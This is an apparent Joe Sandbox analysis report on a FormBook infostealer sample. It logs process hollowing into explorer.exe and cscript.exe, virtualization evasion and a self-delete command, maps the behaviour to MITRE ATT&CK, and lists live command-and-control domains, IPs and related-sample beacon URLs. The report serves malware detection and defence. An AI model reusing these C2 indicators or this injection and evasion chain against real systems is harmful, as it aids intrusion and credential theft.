              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F29F9 mov eax, dword ptr fs:[00000030h]3_2_010F29F9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F29F9 mov eax, dword ptr fs:[00000030h]3_2_010F29F9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114C810 mov eax, dword ptr fs:[00000030h]3_2_0114C810
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116483A mov eax, dword ptr fs:[00000030h]3_2_0116483A
              Source: C:\Windows\SysWOW64\cscript.exe, Code function 5_2_0062647E: GetProcessHeap, HeapAlloc, GetProcessHeap, HeapFree
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe, Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\cscript.exe, Code function 5_2_0062DCAA: SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe, Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\explorer.exe, Network Connect: 91.195.240.19 80
              Source: C:\Windows\explorer.exe, Network Connect: 209.196.146.115 80
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe, NtClose: Indirect: 0x101A56C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe, NtQueueApcThread: Indirect: 0x101A4F2
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe, Memory written: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe, Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe, Section loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe, Section loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\cscript.exe, Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
              Source: C:\Windows\SysWOW64\cscript.exe, Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe, Thread register set: target process: 4084
              Source: C:\Windows\SysWOW64\cscript.exe, Thread register set: target process: 4084
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe, Thread APC queued: target process: C:\Windows\explorer.exe
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe, Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 620000
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe, Process created: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"
              Source: C:\Windows\SysWOW64\cscript.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"
              Source: explorer.exe, 00000004.00000002.3827556743.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3075898374.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2713108965.000000000936E000.00000004.00000001.00020000.00000000.sdmp, Binary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000004.00000002.3819655091.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3820468755.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1390357490.0000000001090000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Progman
              Source: explorer.exe, 00000004.00000002.3820468755.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1390357490.0000000001090000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: 0Program Manager
              Source: explorer.exe, 00000004.00000002.3820468755.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1390357490.0000000001090000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Progmanlock
              Source: explorer.exe, 00000004.00000002.3827556743.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3075898374.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2713108965.000000000936E000.00000004.00000001.00020000.00000000.sdmp, Binary or memory string: Shell_TrayWnd]1Q
              Source: C:\Windows\SysWOW64\cscript.exe, Code function 5_2_0062AADC: GetUserDefaultLCID, FreeLibrary, GetLocaleInfoA, LoadStringA, GetModuleFileNameA, CharNextA, memcpy, strcpy_s, LoadLibraryExA, LoadLibraryExA, sprintf_s, CharNextA, memcpy, strcpy_s, LoadLibraryExA, LoadLibraryExA, GetUserDefaultLCID, GetLocaleInfoA, sprintf_s, CharNextA, memcpy, strcpy_s, LoadLibraryExA, LoadLibraryExA
              Source: C:\Windows\SysWOW64\cscript.exe, Code function 5_2_00637E85: GetLocaleInfoW, wcsncmp
              Source: C:\Windows\SysWOW64\cscript.exe, Code function 5_2_0062AB35: GetLocaleInfoW
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe, Queries volume information: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe VolumeInformation
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe, Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\SysWOW64\cscript.exe, Code function 5_2_0062DC00: GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter
              Source: C:\Windows\SysWOW64\cscript.exe, Code function 5_2_00627490: RegOpenKeyExW, RegOpenKeyExW, SysFreeString, RegCloseKey, RegCloseKey, WideCharToMultiByte, __alloca_probe_16, WideCharToMultiByte, RegOpenKeyExA, GetLastError, RegisterEventSourceW, GetUserNameW, LookupAccountNameW, LookupAccountNameW, ReportEventW, DeregisterEventSource
              Source: C:\Windows\SysWOW64\cscript.exe, Code function 5_2_0062A9C0: InitializeCriticalSection, GetVersionExA
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information


              Remote Access Functionality

              Source: C:\Windows\SysWOW64\cscript.exe, Code function 5_2_00635880: CreateBindCtx, MkParseDisplayName
              Source: C:\Windows\SysWOW64\cscript.exe, Code function 5_2_0062CD6C: CoCreateInstance, CoCreateInstance, GetUserDefaultLCID, CoGetClassObject, CreateBindCtx
              MITRE ATT&CK Matrix (a number in front of a technique is the count of matching signatures; techniques without a number were not observed)

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
              Execution: 1 Native API; 1 Shared Modules; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
              Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
              Privilege Escalation: 612 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
              Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 612 Process Injection; 11 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 22 Software Packing; 1 DLL Side-Loading
              Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
              Discovery: 1 System Time Discovery; 231 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 224 System Information Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
              Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
              Command and Control: 1 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
              Behavior Graph (ID: 1476627; Sample: AB2hQJZ77ipdWem.exe; Startdate: 19/07/2024; Architecture: WINDOWS; Score: 100)

              Start
                DNS/IP: www.suv.xyz; www.mxrkpkngishbdss.xyz (Performs DNS queries to domains with low reputation); 17 other IPs or domains
                Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
                AB2hQJZ77ipdWem.exe (started)
                  Dropped: C:\Users\user\...\AB2hQJZ77ipdWem.exe.log, ASCII
                  Signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes; Switches to a custom stack to bypass stack traces
                  AB2hQJZ77ipdWem.exe (started)
                    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
                    explorer.exe (injected)
                      DNS/IP: parkingpage.namecheap.com 91.195.240.19, 49431, 80, SEDO-ASDE Germany; www.wordcraftart.fun 170.39.213.118, 49435, 80, PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY Reserved; 4 other IPs or domains
                      Signatures: System process connects to network (likely due to code injection or exploit)
                      cscript.exe (started)
                        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
                        cmd.exe (started)
                          conhost.exe (started)

              Source               Detection  Scanner         Label
              AB2hQJZ77ipdWem.exe  66%        ReversingLabs   ByteCode-MSIL.Backdoor.FormBook
              AB2hQJZ77ipdWem.exe  100%       Avira           HEUR/AGEN.1306125
              AB2hQJZ77ipdWem.exe  100%       Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              http://www.kurainu.xyzReferer:0%Avira URL Cloudsafe
              www.gtur.top/v15n/0%Avira URL Cloudsafe
              http://www.gtur.topReferer:0%Avira URL Cloudsafe
              https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/0%Avira URL Cloudsafe
              http://www.wordcraftart.fun0%Avira URL Cloudsafe
              https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi0%Avira URL Cloudsafe
              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg0%Avira URL Cloudsafe
              https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b0%Avira URL Cloudsafe
              http://www.mirotcg.info/v15n/www.mxrkpkngishbdss.xyz0%Avira URL Cloudsafe
              https://wns.windows.com/EM00%Avira URL Cloudsafe
              https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt0%Avira URL Cloudsafe
              http://www.creativelyloud.comReferer:0%Avira URL Cloudsafe
              http://www.brunoduarte.onlineReferer:0%Avira URL Cloudsafe
              http://www.wordcraftart.funReferer:0%Avira URL Cloudsafe
              http://www.y7rak9.com0%Avira URL Cloudsafe
              https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it0%Avira URL Cloudsafe
              http://www.brunoduarte.online/v15n/www.kedai168ef.com0%Avira URL Cloudsafe
              http://www.mirotcg.infoReferer:0%Avira URL Cloudsafe
              http://www.mxrkpkngishbdss.xyz0%Avira URL Cloudsafe
              http://www.syedlatief.com0%Avira URL Cloudsafe
              https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI090%Avira URL Cloudsafe
              http://www.kedai168ef.com0%Avira URL Cloudsafe
              http://www.fwbsmg.lifeReferer:0%Avira URL Cloudsafe
              https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al0%Avira URL Cloudsafe
              http://www.suv.xyz/v15n/www.mirotcg.info0%Avira URL Cloudsafe
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k0%Avira URL Cloudsafe
              http://www.kedai168ef.com/v15n/0%Avira URL Cloudsafe
              http://ns.adobeS0%Avira URL Cloudsafe
              http://www.bt365851.com/v15n/0%Avira URL Cloudsafe
              http://www.gtur.top/v15n/www.fwbsmg.life0%Avira URL Cloudsafe
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark0%Avira URL Cloudsafe
              http://www.hacks.digital/v15n/www.creativelyloud.com0%Avira URL Cloudsafe
              http://www.mirotcg.info0%Avira URL Cloudsafe
              http://www.gtur.top0%Avira URL Cloudsafe
              http://www.syedlatief.com/v15n/www.gtur.top0%Avira URL Cloudsafe
              http://www.boostgrowmode.com0%Avira URL Cloudsafe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.wordcraftart.funexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://schemas.microexplorer.exe, 00000004.00000000.1391014602.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3825259547.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1394973187.0000000007710000.00000002.00000001.00040000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.mirotcg.info/v15n/www.mxrkpkngishbdss.xyzexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://wns.windows.com/EM0explorer.exe, 00000004.00000000.1406109687.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.brunoduarte.onlineReferer:explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.creativelyloud.comReferer:explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.wordcraftart.funReferer:explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.y7rak9.comexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.brunoduarte.online/v15n/www.kedai168ef.comexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.mirotcg.infoReferer:explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.mxrkpkngishbdss.xyzexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.syedlatief.comexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.kedai168ef.comexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fwbsmg.lifeReferer:explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.suv.xyz/v15n/www.mirotcg.infoexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9kexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.bt365851.com/v15n/explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.gtur.top/v15n/www.fwbsmg.lifeexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.kedai168ef.com/v15n/explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://ns.adobeSexplorer.exe, 00000004.00000002.3822791120.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1392124977.0000000004405000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.mirotcg.infoexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.hacks.digital/v15n/www.creativelyloud.comexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-darkexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.gtur.topexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.syedlatief.com/v15n/www.gtur.topexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.boostgrowmode.comexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
IP | Domain | Country | ASN | ASN Name | Malicious
170.39.213.118 | www.wordcraftart.fun | Reserved | 139776 | PETRONAS-BHD-AS-AP Petroliam Nasional Berhad MY | true
3.64.163.50 | www.suv.xyz | United States | 16509 | AMAZON-02US | true
91.195.240.19 | parkingpage.namecheap.com | Germany | 47846 | SEDO-ASDE | true
209.196.146.115 | www.hacks.digital | Canada | 13768 | COGECO-PEER1CA | true
3.33.130.190 | mirotcg.info | United States | 8987 | AMAZONEXPANSIONGB | true
206.119.184.155 | msdklf.dsaf.apkdowncdn.com | United States | 174 | COGENT-174US | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1476627
Start date and time: 2024-07-19 10:51:16 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: AB2hQJZ77ipdWem.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@267/1@11/6
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 98
• Number of non-executed functions: 364
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: AB2hQJZ77ipdWem.exe
Time | Type | Description
04:52:07 | API Interceptor | 1x Sleep call for process: AB2hQJZ77ipdWem.exe modified
04:52:17 | API Interceptor | 6775700x Sleep call for process: explorer.exe modified
04:52:52 | API Interceptor | 6230171x Sleep call for process: cscript.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3.64.163.50
  V691KUgebCvcYp2.exe | malicious | FormBook, PureLog Stealer | www.neurasaudi.com/v15n/?FTL0dZ=MC7jW79DvpbAXJOACJLEaCWT/AP2Kd9jE1xFeh1tqTEwjDB7HW85AKdG2Lw4mA/hM2am&mT=VDKPcJrp9d844v
  nell.doc | malicious | FormBook | www.runccl.com/btrd/?wL308b=HDHXtPC&RDH=C3V55vmoRLzhdzVvPxQureN2DAJdCLOy0KNGMxX6PWn438lVXaAPIOjwnvV0EoY+ctb1nw==
  DHL_TOC2_2407081728458457.pdf.exe | malicious | FormBook | www.hinet.tech/rn94/?Txo=/u8AhuqikW5Z0ux+TtooNTgLT9+7EoBKYM4wN1PZe+qnUGIltiWSddGKDn68HfcTIAyH&vB=lf5P
  vNrcPvMYLZmn2cc.exe | malicious | FormBook | www.motolimod.com/mc10/?yrCDSlw=vFB2baRb3l6bUISctXbh3E5xW9PPAAbphga1xIFZj8yJGRkxzOANKPapIGqDb2wiW/5D&Jlt=Y4Ctjz3PDNY8yDR
  Akb38lKYd6rDV8l.exe | malicious | FormBook | www.mrwine.xyz/dy13/?uRDX=nOOUddJSUzumUEOwN08yX7QbQXzFXI1eXPVGsAvMbd1lknBUetPROzpkz+qgZSNVPsaq&OjH8a=9r44lZrP
  PO HA25622.exe | malicious | FormBook | www.cilynder.com/h209/?mlYT=SxolxB&Dzrx=4XPTPvu2L+BVlMtUJvxxjUwWAXLL/jGlg5CCnZ7c9YjMmTibPLsLpJHt34rm8QiNyPuf
  8tvMmyxveyzFcnJ.exe | malicious | FormBook | www.motolimod.com/mc10/?M6=vFB2baQv3F/rJ4Poxnbh3E5xW9PPAAbphga1xIFZj8yJGRkxzOANKPapIG+pOmwhUo5D&sZ=Ynzp6xUh
